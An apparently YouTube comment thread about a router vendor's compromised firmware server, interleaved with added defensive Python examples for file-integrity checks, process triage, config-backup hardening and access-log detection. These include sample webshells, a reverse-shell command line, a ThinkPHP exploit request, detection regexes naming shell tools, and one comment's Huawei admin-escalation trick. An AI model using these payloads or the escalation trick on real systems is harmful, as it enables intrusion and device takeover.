@mattbrwn I personally love how much detail you put into explaining your process in videos! Brevity sucks when it comes at the cost of information :))
Hey Matt. Nice video as always. I know that all of this is for educational purposes, but using scanning tools like nuclei with default settings could lead to a very high number of requests to the server, which can be detected by the blue team. I know that the security of this company is so bad, but be careful using these tools, especially if it isn't in a bug bounty program.
@mattbrwn Probably full because the attacker is using it as a C&C server and a data exfiltration server, and at the same time it is also being used as a repository to store ransomware keys as well. Removing all that would probably be good, but it is easier to first wipe all of that out, then reboot, after running an update on the server.
I spend a lot of time in the Philippines (I'm in the UK), and when we're out there I love picking up the really dodgy Chinesium crap just to take it to bits and explore the software. You can buy some really interesting things for less than £5 or 600-700 PHP; that's a day's wages out there for a lot of people, but it's pennies for us in the West.
Matt, this is great info again! At first glance I was expecting to hear about Netgear, Cisco and KV bots. But after the first few minutes, it was all about the TOTOLINK. Thank you for sharing this vulnerability. Also, words of wisdom for you while you are recovering: a hack a day makes your problems go away, or is it an apple a day keeps the bugs away! 😂
This couldn't be any more perfect, and it's precisely why we developed a system that blocks execution of unknown PHP code within the PHP engine; detecting unknown files that appear is good to do but likely to be too late, so we focussed on the execution engine and blocking inside the engine itself. Were they using the system, they'd get a real time alert when attempting to execute the file, the malware wouldn't run, and they'd have a chance to unblock the file if it was a false positive. Mostly gone are the days of Apache letting you run PHP code hidden in exif tags of image files, but using exploits to plant arbitrary code onto PHP based systems is still incredibly common and widespread.
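The distinction the comment above draws, between noticing a new file after it has appeared and refusing unknown code at the moment it is about to run, comes down to one allowlist used in two places. The following is an added Python example, not the commenter's product and not code from the video or the site that was compromised: it builds a SHA-256 manifest of a webroot's PHP files, then shows a periodic scan (which reports the planted file only after the fact) next to an execution-time gate (which refuses it outright). The webroot layout, the dropped file and the tampered library are all constructed for the demo.

```python
from __future__ import annotations

import hashlib
import hmac
import tempfile
from pathlib import Path

# Constructed demo: the webroot layout, the dropped file name and the
# file contents below are invented for illustration.


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(webroot: Path) -> dict[str, str]:
    """Snapshot every .php file under webroot as relative path -> SHA-256.
    Taken from a known-good deployment, this is the allowlist."""
    return {
        p.relative_to(webroot).as_posix(): sha256_file(p)
        for p in sorted(webroot.rglob("*.php"))
    }


def scan_for_unknown(webroot: Path, manifest: dict[str, str]) -> dict[str, list[str]]:
    """After-the-fact scan (cron job, FIM agent): reports what differs from
    the manifest. Anything under "new" may already have been executed by
    the time the scan runs, which is the race the comment describes."""
    current = build_manifest(webroot)
    return {
        "new": sorted(set(current) - set(manifest)),
        "modified": sorted(p for p in current if p in manifest and current[p] != manifest[p]),
        "missing": sorted(set(manifest) - set(current)),
    }


def allow_execution(webroot: Path, rel_path: str, manifest: dict[str, str]) -> bool:
    """Execution-time gate: the decision an in-engine hook would make just
    before a script runs. Unlisted or altered content is refused whatever
    its name, extension or timestamp; a false positive surfaces as a
    refused run that an operator can unblock by updating the manifest."""
    expected = manifest.get(rel_path)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_file(webroot / rel_path), expected)


def demo() -> dict:
    """Build a tiny webroot, take the manifest, simulate a planted webshell
    and a backdoored library, then compare scan and gate."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "lib").mkdir()
        (root / "index.php").write_text("<?php echo 'hello'; ?>")
        (root / "lib" / "db.php").write_text("<?php // database helpers ?>")
        manifest = build_manifest(root)

        # Post-exploitation changes (constructed): a dropped shell plus an
        # existing file that now carries a backdoor.
        (root / "uploads").mkdir()
        (root / "uploads" / "x.php").write_text("<?php system($_GET['c']); ?>")
        (root / "lib" / "db.php").write_text("<?php eval($_POST['p']); ?>")

        return {
            "scan": scan_for_unknown(root, manifest),
            "gate_index": allow_execution(root, "index.php", manifest),
            "gate_upload": allow_execution(root, "uploads/x.php", manifest),
            "gate_db": allow_execution(root, "lib/db.php", manifest),
        }


if __name__ == "__main__":
    print(demo())
```

The manifest is only as trustworthy as the deployment that produced it: generate it from the release artefact rather than from the live server, and store it where the web server's user cannot write, otherwise the same exploit that drops the shell can add it to the allowlist.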
Great Video as always! Though one thing you should take a look at is your audio. In I think all of your videos, there's a crackling sound, which I don't get when watching other creators or playing games/listening to music.
@mattbrwn I think it's constant. If you don't hear it on your PC, maybe try listening to your video on your phone? Or take some old headphones and try those.
I see name-brand routers, Chinese of course, on Amazon for like $20-$40 USD. Are these routers running firmware replaced by the Chinese to get on your network? 🤔
Do a 'ps laxw' on the server and maybe a 'who -a' to see if there's any hacker remnants. Don't publish the output, maybe comment on suspicious things you note.
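Eyeballing `ps laxw` and `who -a` output works, but it helps to know what to look for. As an added example (Python, not from the commenter or the video), the script below parses the two outputs and applies a few triage heuristics that a responder would check first: processes running out of temp or hidden directories, a user-space process disguised with a kernel-thread name (real kernel threads are children of kthreadd, PID 2), reverse-shell command lines, and login sessions from outside the networks you administer from. The sample output and the trusted network range are constructed; on a real host you would pipe the live command output in.

```python
from __future__ import annotations

import ipaddress
import re

# Constructed sample in the shape of `ps laxw` on a Linux host. PIDs, paths
# and addresses are invented; 198.51.100.0/24 is a documentation range.
PS_SAMPLE = """\
F   UID     PID    PPID PRI  NI    VSZ   RSS WCHAN  STAT TTY        TIME COMMAND
4     0       1       0  20   0 167000 11000 -      Ss   ?          0:02 /sbin/init
1     0       2       0  20   0      0     0 -      S    ?          0:00 [kthreadd]
1     0      15       2  20   0      0     0 -      S    ?          0:00 [kworker/0:1]
4    33     801       1  20   0 221000 20000 -      S    ?          0:05 /usr/sbin/apache2 -k start
4    33    2310     801  20   0   6200  1800 -      S    ?          3:41 [kworker/1:2]
4    33    2344    2310  20   0   8900  2400 -      S    ?          0:00 /bin/bash -c bash -i >& /dev/tcp/198.51.100.9/4444 0>&1
4    33    2398       1  20   0 512000 90000 -      SL   ?         41:10 /dev/shm/.x/xmrig -o pool.example.net:3333
4     0    4120    4001  20   0  12000  5000 -      Ss   pts/0      0:00 -bash
"""

# Constructed sample in the shape of `who -a`.
WHO_SAMPLE = """\
           system boot  2024-03-02 07:58
           run-level 5  2024-03-02 07:58
root     + pts/0        2024-03-02 08:40   .          4001 (10.0.0.12)
www-data - pts/1        2024-03-02 11:03 00:12        2355 (198.51.100.9)
LOGIN      tty1         2024-03-02 07:58               800 id=tty1
"""

SUSPECT_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
REVERSE_SHELL = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|bash -i|socat\b.*exec:", re.I)
# user, optional mesg flag (+ - ?), tty, date, ..., (origin host)
WHO_LINE = re.compile(
    r"^(\S+)\s+(?:[+?-]\s+)?(\S+)\s+\d{4}-\d\d-\d\d \d\d:\d\d.*\(([^)]*)\)\s*$"
)


def parse_ps_laxw(text: str) -> list[dict]:
    """Split `ps laxw` rows into the fields we need; COMMAND keeps its spaces."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 12)
        if len(parts) < 13 or not parts[2].isdigit():
            continue  # header or malformed line
        rows.append({
            "uid": int(parts[1]), "pid": int(parts[2]), "ppid": int(parts[3]),
            "stat": parts[9], "tty": parts[10], "cmd": parts[12],
        })
    return rows


def flag_processes(rows: list[dict]) -> list[tuple[int, str, str]]:
    """Heuristics for remnants an intruder commonly leaves running."""
    findings = []
    for r in rows:
        cmd = r["cmd"]
        exe = cmd.split()[0] if cmd else ""
        if exe.startswith(SUSPECT_DIRS) or "/." in exe:
            findings.append((r["pid"], "runs from a temp or hidden directory", cmd))
        # Kernel threads descend from kthreadd (PID 2); anything else wearing
        # a [kworker]-style name is a process trying not to be noticed.
        if cmd.startswith("[") and r["pid"] != 2 and r["ppid"] != 2:
            findings.append((r["pid"], "kernel-thread name but not a kernel thread", cmd))
        if REVERSE_SHELL.search(cmd):
            findings.append((r["pid"], "reverse-shell command line", cmd))
    return findings


def parse_who(text: str) -> list[tuple[str, str, str]]:
    """(user, tty, origin) for each login session in `who` / `who -a` output."""
    out = []
    for line in text.splitlines():
        m = WHO_LINE.match(line)
        if m:
            out.append((m.group(1), m.group(2), m.group(3)))
    return out


def flag_sessions(sessions, trusted_cidrs: list[str]) -> list[tuple[str, str, str]]:
    """Sessions whose origin is outside the admin networks you expect.
    The trusted ranges are an assumption you supply for your own host."""
    nets = [ipaddress.ip_network(c) for c in trusted_cidrs]
    flagged = []
    for user, tty, host in sessions:
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            flagged.append((user, tty, host))  # hostname or odd value: look at it
            continue
        if not any(addr in n for n in nets):
            flagged.append((user, tty, host))
    return flagged


if __name__ == "__main__":
    for pid, why, cmd in flag_processes(parse_ps_laxw(PS_SAMPLE)):
        print(f"PID {pid}: {why}: {cmd}")
    for user, tty, host in flag_sessions(parse_who(WHO_SAMPLE), ["10.0.0.0/8"]):
        print(f"session {user} on {tty} from {host}")
```

`ps` cannot tell you that a running binary has been unlinked from disk, a common trick for miners and implants; on a live host, follow each flagged PID with `readlink /proc/<pid>/exe` and look for the `(deleted)` suffix, and check the `who` sessions against `last` and the authentication log before drawing conclusions.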
I have Huawei routers like the HG8245 or HG8247. U-Boot on these devices is uninterruptible, so how can I extract or flash firmware on these devices? Please help...
I dumped the firmware from the NOR SPI flash of a Huawei DG8045 with firmware customized by Vodafone. The web login interface has admin and user permissions; the user one is printed on the back of the router, and the admin has full control of the router. I tried to investigate the firmware, extracted the kernel and tried using Ghidra, but nothing; even the cfg file is encrypted. I tried to decrypt some info, but nothing. Even when I tried to gain access through the UART shell, the router boots up and the shell stops at "Starting kernel". I interrupted the two bootloaders (the first is bootrom, the second is hiboot) to manipulate the kernel loading process, but the common bootargs don't work.
My Huawei HG8045 is a lot less secure than yours. I can download a backup config, copy my user password hash to admin, restore the backup and I have admin access. The config is encrypted, but there's also a git repo with documentation on how to decrypt it. Also, the admin password is the same default one that you can find online once you know the hash. In my case the username is "r&duser".
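The privilege escalation in the comment above (copy the user account's hash over the admin's in an exported config, then restore it) works for two reasons: the stored hash is not bound to the account it belongs to, and the restore path trusts whatever blob it is handed. The following is an added Python example, not the commenter's code and not Huawei's: a toy model of that weak design beside a hardened one that binds each PBKDF2 hash to its username and authenticates the exported backup with an HMAC under a per-device key. The config layout, account names, passwords and device key are all invented for the demo.

```python
from __future__ import annotations

import hashlib
import hmac
import json
import os

# Constructed model of a router that exports and restores its configuration.
# Account names, passwords, the JSON layout and the device key are invented.
ITERATIONS = 50_000


# --- Weak design: unsalted hash, restore trusts whatever it is given -------

def weak_hash(password: str) -> str:
    # Unsalted and not tied to any account, so the digest is interchangeable
    # between users: the property the transplant relies on.
    return hashlib.sha256(password.encode()).hexdigest()


def weak_login(config: dict, user: str, password: str) -> bool:
    rec = config["users"].get(user)
    return rec is not None and hmac.compare_digest(rec["hash"], weak_hash(password))


def weak_export(config: dict) -> str:
    # The real device encrypts the blob; once the scheme is documented that
    # is equivalent to plaintext, which is what is modelled here.
    return json.dumps(config)


def weak_import(blob: str) -> dict:
    return json.loads(blob)  # no integrity check at all


def transplant(blob: str, src_user: str, dst_user: str) -> str:
    """What the commenter describes: paste one account's hash over another's."""
    cfg = json.loads(blob)
    cfg["users"][dst_user]["hash"] = cfg["users"][src_user]["hash"]
    return json.dumps(cfg)


# --- Hardened design: account-bound hashes, authenticated backups ----------

def bound_hash(user: str, password: str, salt: bytes) -> str:
    # The username is mixed into the salt, so a digest computed for "user"
    # never verifies under "admin", even if the whole record is copied.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), user.encode() + salt, ITERATIONS).hex()


def bound_login(config: dict, user: str, password: str) -> bool:
    rec = config["users"].get(user)
    if rec is None:
        return False
    return hmac.compare_digest(rec["hash"], bound_hash(user, password, bytes.fromhex(rec["salt"])))


def signed_export(config: dict, device_key: bytes) -> str:
    body = json.dumps(config, sort_keys=True)
    tag = hmac.new(device_key, body.encode(), "sha256").hexdigest()
    return json.dumps({"body": body, "tag": tag})


def signed_import(blob: str, device_key: bytes) -> dict:
    obj = json.loads(blob)
    expected = hmac.new(device_key, obj["body"].encode(), "sha256").hexdigest()
    if not hmac.compare_digest(expected, obj["tag"]):
        raise ValueError("backup rejected: MAC mismatch")
    return json.loads(obj["body"])


def demo() -> dict:
    """Run the transplant against both designs and report the outcomes."""
    user_pw, admin_pw = "printed-on-the-label", "vendor-default"

    weak_cfg = {"users": {"admin": {"hash": weak_hash(admin_pw)},
                          "user": {"hash": weak_hash(user_pw)}}}
    weak_after = weak_import(transplant(weak_export(weak_cfg), "user", "admin"))

    key = os.urandom(32)  # per-device key that never leaves the device
    salts = {"admin": os.urandom(16), "user": os.urandom(16)}
    hard_cfg = {"users": {
        u: {"salt": salts[u].hex(), "hash": bound_hash(u, pw, salts[u])}
        for u, pw in (("admin", admin_pw), ("user", user_pw))}}
    # 1) edit the exported body without the key: restore must refuse it
    obj = json.loads(signed_export(hard_cfg, key))
    obj["body"] = transplant(obj["body"], "user", "admin")
    try:
        signed_import(json.dumps(obj), key)
        restore_rejected = False
    except ValueError:
        restore_rejected = True
    # 2) even if a transplanted record (hash and salt) reached the device by
    #    some other route, it does not verify under the admin username
    forged = json.loads(transplant(json.dumps(hard_cfg), "user", "admin"))
    forged["users"]["admin"]["salt"] = hard_cfg["users"]["user"]["salt"]

    return {
        "weak_login_as_admin_with_user_pw": weak_login(weak_after, "admin", user_pw),
        "hardened_restore_rejected": restore_rejected,
        "hardened_login_as_admin_with_user_pw": bound_login(forged, "admin", user_pw),
        "hardened_legit_admin_login": bound_login(hard_cfg, "admin", admin_pw),
    }


if __name__ == "__main__":
    print(demo())
```

The per-device key matters: if one key were shared across every unit of a model, pulling it out of a single flash dump (the kind of extraction an earlier comment describes) would let an attacker re-sign backups for all of them, whereas a per-device key confines the damage to the unit already in the attacker's hands.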
Just out of curiosity, is what you show legal to do in the US? Where I am, in Denmark, it's illegal to access systems without authorization. IANAL, but I think what you did would be deemed hacking and illegal.
One might agree with what you say if some effort had been put into securing the server. They provided the ability to enter commands through an HTTP POST to everyone, without requiring authorization. So one could argue that there is no authorization requirement. Matt didn't alter anything on the server; someone else already did that.
Everybody in the world buying any router or smart device from an unbranded store (or even a well-known brand name that is now merely a marketing name put on the cheapest stuff they can find), or getting any ISP- or telco-supplied equipment, which is the cheapest thing they can get, with the firmware often only changed to put a branding on the screens, nothing else, and relying on the OEM to do upgrades, if ever.
No, it's remote code execution. The PHP module in Apache (I assume) is an old version and configured the wrong way. If you send a special string, you can add (bash) commands to it that will be executed on the remote server.
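Whatever the exact bug, an RCE reached through a crafted request leaves traces in the web server's access log, which is where a defender (or the blue team a comment near the top mentions) would look first. The following is an added Python example, not from the commenter, the video or the affected site: it parses Apache combined-format log lines, URL-decodes the request target (twice, to catch double encoding) and applies a handful of narrow rules for request-borne command execution. The log lines are constructed; the first one follows the widely published ThinkPHP 5 "invokefunction" request shape, included as one concrete example because ThinkPHP is named later in the thread, although the thread does not say which ThinkPHP bug was involved. The upload-directory rule is a site-specific assumption.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Constructed access-log lines in Apache "combined" format. Hosts, paths and
# timestamps are invented (RFC 5737 documentation addresses). Line 1 mimics
# the widely published ThinkPHP 5 "invokefunction" request shape; which bug
# was actually exploited is not stated in the thread, so that is an assumption.
SAMPLE_LOG = """\
203.0.113.4 - - [02/Mar/2024:11:02:17 +0000] "GET /index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http://198.51.100.9/x.sh%20-O%20/tmp/x.sh HTTP/1.1" 200 512 "-" "curl/7.88.1"
198.51.100.9 - - [02/Mar/2024:11:05:40 +0000] "POST /upload.php?name=a.jpg%3Bid HTTP/1.1" 200 88 "-" "python-requests/2.31"
192.0.2.10 - - [02/Mar/2024:11:06:01 +0000] "GET /firmware/download.php?id=1234 HTTP/1.1" 200 10240 "-" "Mozilla/5.0"
203.0.113.4 - - [02/Mar/2024:11:07:22 +0000] "GET /uploads/x.php?c=cat%20/etc/passwd HTTP/1.1" 200 1700 "-" "curl/7.88.1"
"""

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Each rule is applied to the URL-decoded request target.
RULES = [
    # ThinkPHP 5 invokefunction chain (assumed relevant, see above)
    ("thinkphp_invokefunction",
     re.compile(r"\\think\\app/invokefunction|call_user_func_array", re.I)),
    # a PHP execution primitive passed as a parameter value or called directly
    ("php_exec_function",
     re.compile(r"(?:^|[=&/(])(?:system|passthru|shell_exec|popen|proc_open|eval|assert)(?:\(|&|$)", re.I)),
    # shell metacharacter immediately followed by a common command
    ("shell_metachar_command",
     re.compile(r"(?:[;|`]|\$\()\s*(?:id|whoami|uname|cat|wget|curl|sh|bash|nc|chmod|python)\b", re.I)),
    # fetch-and-drop into a world-writable directory
    ("downloader_to_tmp",
     re.compile(r"\b(?:wget|curl)\b.*(?:/tmp/|/dev/shm/|/var/tmp/)", re.I)),
]

# Site-specific assumption for the demo: nothing under the upload directory
# should ever be executed as PHP, so any .php request there is a finding.
UPLOAD_DIRS = ("/uploads/",)


def decode_target(target: str) -> str:
    """URL-decode twice so a double-encoded payload is inspected as sent."""
    return unquote_plus(unquote_plus(target))


def analyse_line(line: str) -> tuple[str, str, str, list[str]] | None:
    """Return (client, method, decoded target, reasons); None if unparsable."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    client, _ts, method, target, _status, _size = m.groups()
    decoded = decode_target(target)
    path = decoded.split("?", 1)[0]
    reasons = [name for name, rx in RULES if rx.search(decoded)]
    if path.lower().endswith(".php") and any(d in path for d in UPLOAD_DIRS):
        reasons.append("php_in_upload_dir")
    return client, method, decoded, reasons


def detect(log_text: str) -> list[tuple[int, str, list[str]]]:
    """(line number, client, reasons) for every request that trips a rule."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        r = analyse_line(line)
        if r and r[3]:
            hits.append((n, r[0], r[3]))
    return hits


if __name__ == "__main__":
    for n, client, reasons in detect(SAMPLE_LOG):
        print(f"line {n} from {client}: {', '.join(reasons)}")
```

Standard access logs record only the request line, so a payload carried in a POST body (the situation described a couple of comments up, where commands were accepted through an HTTP POST) never shows up here; catching that needs request-body logging at the reverse proxy or a WAF in front of PHP. The rules are deliberately narrow to keep false positives down: treat a hit as the trigger for pulling the full request and the file-system changes from the same time window, not as proof on its own.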
Any of these cheap devices from overseas are only useful if they can run OpenWrt or similar open-source firmware... I would never trust firmware from even "reputable" brands, as most never get updated, since these devices are all treated as disposable anyway.
Why don't you take on devices from major supposedly trusted brands like ASUS, Netgear, Linksys and TP-Link and hack those? That would be cool! Of course, you aren't supposed to buy Chinese junk. Instead of this, which was already hacked for you by both the manufacturer and someone online.
A ThinkPHP RCE bug on the manufacturer's firmware hosting site is very different from what the video title implies. On the contrary, they are the victim of this incident as well; even if they did want a backdoor, they wouldn't implement it this way. Ironically, aren't you conducting an unauthorised cross-border penetration scan and making an irresponsible vulnerability disclosure? Imagine it the other way around: "Chinese hacker compromises US tech companies."
He said he tried to contact them. I agree it’s not exactly what we think of as a hardware backdoor, but I still don’t like your framing. It suggests you have to have some special credentials to do a security audit of hardware you own.
@schlickit628 You do, theoretically. Cisco switches/routers put these warning messages in the telnet/ssh banner. They claim to reserve the right to sue anyone reverse engineering their firmware without authorization, though they rarely exercise it (probably for PR reasons). However, what he's done goes way beyond passive/static reverse engineering of some files he 'owns': he conducted an active, intrusive URL scan against a live production backend owned by a foreign commercial entity, presumably through his home Internet, and made an irresponsible vuln disclosure. I don't see any element of this that is compliant at all. As I said, if it were the other way around, the narrative would be "Chinese hacking US tech companies." Pure hypocrisy, if you compare what the clickbaity title implies to his actual behaviour.
@schlickit628 You do, theoretically. Switches/routers put warning messages in the telnet/ssh banner claiming they reserve the right to sue anyone reverse engineering their intellectual-property-protected firmware without authorization, though they rarely exercise it, probably for PR reasons. However, what he's done goes way beyond passive/static reverse engineering of some files he 'owns': he conducted an active, intrusive URL scan against a live production backend owned by a foreign commercial entity, presumably through his home Internet, and made an irresponsible vuln disclosure. I don't see any element of this that is compliant at all. As I said, if it were the other way around, the narrative would be -youtube deletes my comment-. Pure hypocrisy, if you compare what the title implies to his actual behaviour.